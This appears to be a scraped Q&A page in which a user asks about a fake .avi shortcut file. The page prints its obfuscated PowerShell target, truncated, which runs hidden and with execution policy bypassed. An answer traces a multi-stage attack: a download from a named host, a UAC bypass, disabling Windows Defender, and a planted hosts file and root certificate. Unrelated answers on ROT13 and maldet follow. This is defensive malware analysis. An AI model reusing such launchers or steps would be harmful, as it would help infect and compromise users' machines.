Is this is a malware invocation of Powershell

malware

I got a file that was .avi at the fist glance, but then I found out that in fact this is a .lnk file, but it was too late.

And the target element attribute of that file is
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

The starting point is: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

I created String out of following ASCII codes and it seems that it is a BASE64 format of Hallo World!. It seems very confusing to me as I couldn't find NoPr, Wind and eXEc parameters anywhere in the docs of Powershell, additionaly for some reason the file had size of 700MB until I removed .avi value from file description field.

Do you know what this file could try to do?

Best Answer

This is definitely malware!

Basically this is a malware with multiple stages. So far I have gone through:

Stage 1 (the .lnk file)

Downloads and executes powershell code from http://zvd.us/1

Stage 2

The downloaded powershell code contains a verbatim copy of https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, which seems to be some UAC bypass. It then downloads and executes (as admin) a batch file.

Stage 3

The batch file first tries to disable all Windows Defender components (drivers, scheduled tasks, autorun entries) and adds group policies to that effect. It then downloads and executes 2 files. I will post virus total links to the files.

The first seems to be a recognised malware. Whereas the second is an NSIS installer which I have yet to analyze fully. It seems replace the systems hosts file with it's own, redirecting many domains to 80.241.222.137 and it installs a root certificate.

Related Solutions

Does anyone recognize this e-mail sniffer or malware using ROT13 encoding

Hah, 5 minutes after posting the question I found the answer myself. Ever had that happen to you? :-)

https://security.stackexchange.com/questions/48684/help-investigating-potential-website-attack-url-rewriting-and-rot-13-obfuscatio

Essentially:

It took a few calls with AboveNet (now part of Zayo), but we were finally able to determine that one of their customers is an anti-malware firm based in the UK, providing services to two of our common customers. They were scanning all incoming emails and probing any hyperlinks to identify potential hazards and/or vulnerabilities in the destinations.

How to add wildcards to Linux Malware Detect ignore_paths

I have found only

/usr/local/maldetect/ignore_inotify
A line spaced file for regexp paths that are excluded from inotify monitoring
Sample ignore entry:
^/home/user$
^/var/tmp/#sql_.*\.MYD$

http://www.rfxn.com/appdocs/README.maldetect

If you monitor files with inotify(flag -m) then it can help you.

Based on this code of maldet:

 if [ "$days" == "all" ]; then
  if [ -z "$setmodsec" ]; then
          eout "{scan} building file list for $spath, this might take awhile..." 1
  fi
  $find $spath $tmpdir_paths -maxdepth $maxdepth -type f -size +${minfilesize}c -size -$maxfilesize $ignore_fext | grep -vf $ignore_paths > $find_results
 else
  if [ -z "$setmodsec" ]; then
          eout "{scan} building file list for $spath of new/modified files from last $days days, this might take awhile..." 1
  fi
  $find $spath $tmpdir_paths -maxdepth $maxdepth -type f -mtime -$days -size +${minfilesize}c -size -$maxfilesize $ignore_fext | grep -vf $ignore_paths > $find_results
 fi

I can say that you can use same wildcards as you do usually in grep.

However i have tested it on my version of maldet and it works only if i specified it like this:

/home/.*/homes/.*/Maildir

Try use dots in your path expressions.